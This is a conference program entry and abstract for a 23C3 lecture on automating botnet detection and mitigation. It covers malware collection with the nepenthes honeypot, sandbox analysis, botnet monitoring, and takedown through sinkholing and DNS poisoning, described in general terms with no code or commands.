23C3 - 1.5

23rd Chaos Communication Congress
Who can you trust?

Georg 'oxff' Wicherski
Day 4
Room Saal 2
Start time 11:30
Duration 01:00
ID 1342
Event type Lecture
Track Hacking
Language English

Automated Botnet Detection and Mitigation

How to find, invade and kill botnets automated and effectively

Botnets are one of the most buzzy buzzwords out there today in the computer security world. The presented approach allows us to take reliably care of these, such that managers hopefully will not react on ``botnet'' in 2008 any more. This technology allows for automated catching of malware with the now somewhat known nepenthes daemon, automated analysis with CWSandbox and other sandboxes, automated botnet snooping with the botsnoopd daemon and finally (semi-)automated mitigation using various weapons. Hopefully, our autonomous approach will never turn against the human race and begin the final war...

This presentation explains the various components of our approach to botnet detection and mitigation from the beginning to the end in detail.

First, we will have a look at nepenthes; see how it has evolved, works and also point out some weaknesses. nepenthes is a versatile tool for malware collection and available under the GPL license at <http://nepenthes.mwcollect.org/>. Although, people have presented on it on various conferences, this tool is still not known by a lot of malware researchers. Additionally, most presentation focus on the results you can achive with nepenthes, whereas this presentation will show you how it really works.

The next step in botnet mitigation then is to sandbox the malware to gather information about the botnet itself, e.g. server hostname, channel names or for other types of botnet, the other relevant information for connecting to it. Our current approach is based on the CWSandbox developed by Carsten Willems at the RWTH Aachen, not available to the public. We however also work with the Chinese Honeynet Project's work (MWSniffer), experiment with Norman's work (Norman Sandbox) and plan to include Emsi's work in the future (CodeKnigge).

After sandboxing the malware, we automatically connect into the botnet and snoop all relevant commands, traffic and generate statistics (some fancy charts that is). This allows us to generate statistics about DDoS attacks carried out throug monitored botnets, gather intelligences about identity theft and provide LEOs with relevant information (the most reliable way to mitigate botnets). We closely cooperate with the ShadowServer crew for botnet monitoring.

Once a botnet has been identified as a severe threat to the Internet, it can be shut down (semi-) automatically. Since we wanted to stay away from a solely automated atomar weapon, which might be fooled to be autonomously fired at Washington, D.C., we still have to confirm the mitigation process. Mitigation involves notification of involved ASNs, botnet sinkholing and DNS poisoning. Additionally, cooperation with some German ISPs will hopefully enable us to cut off infected clients from the Internet in the future.